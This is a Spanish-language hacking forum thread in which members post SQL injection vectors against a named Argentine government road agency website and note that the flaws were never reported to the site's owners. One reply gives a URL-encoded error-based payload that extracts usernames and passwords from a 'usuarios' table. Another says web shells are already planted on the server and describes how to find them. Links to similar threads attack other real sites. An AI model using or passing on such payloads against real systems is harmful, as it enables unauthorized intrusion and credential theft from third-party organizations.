SQLI http://www.vialidad.gba.gov.ar/

  • 3 Respuestas
  • 2055 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hdbreaker

  • *
  • Ex-Staff
  • *****
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
  • Skype: hdbreaker96
  • Twitter: @SecSignal
    • Ver Perfil
    • Security Signal
    • Email

SQLI http://www.vialidad.gba.gov.ar/

  • en: Junio 27, 2013, 06:31:25 pm


SQLI
Vector: You are not allowed to view links. Register or Login() limit 1,1--%20-c
Reportado: No
« Última modificación: Enero 10, 2015, 01:15:06 pm por Expermicid »

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado eldb22

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:SQLI http://www.vialidad.gba.gov.ar/

  • en: Julio 21, 2013, 03:13:55 pm
¡Buenisimo! Pero no pude sacarle jugo a ese vector, todavia me falta aprender bastante de SQLi. Pero encontré otro:

Vector: You are not allowed to view links. Register or Login*%29,concat%280x7c,%28select%20concat%28usuario,0x7c,0x636f6e74726173651f61%29%20from%20usuarios%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20%23
Reportado: no

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1967
  • Actividad:
    33.33%
  • Country: es
  • Reputación 16
    • Ver Perfil

Re:SQLI http://www.vialidad.gba.gov.ar/

  • en: Julio 21, 2013, 06:35:23 pm
No sé si lo sabias o no, pero ya hay shells ahi...

Url: You are not allowed to view links. Register or Login

Fijate a la derecha salen muchos archivos en php, pues si le das al iconito verde entras a ese archivo, muchos están eliminados pero otros no.

Un saludo :)


Desconectado hdbreaker

  • *
  • Ex-Staff
  • *****
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
  • Skype: hdbreaker96
  • Twitter: @SecSignal
    • Ver Perfil
    • Security Signal
    • Email

Re:SQLI http://www.vialidad.gba.gov.ar/

  • en: Julio 25, 2013, 02:24:55 am
Si sabia que había shell, pero queria compartir el sqli que encontre, y q de hecho parece no estar reportado, ni por mi ni por los que subieron shell

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 1772
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 2207
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 2461
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 4661
Último mensaje Junio 02, 2017, 06:39:33 am
por baah
(SQLi) Double Query/Error Based - www.polimedicado.com

Iniciado por M5f3r0

Respuestas: 1
Vistas: 2051
Último mensaje Julio 26, 2013, 04:52:33 pm
por ANTRAX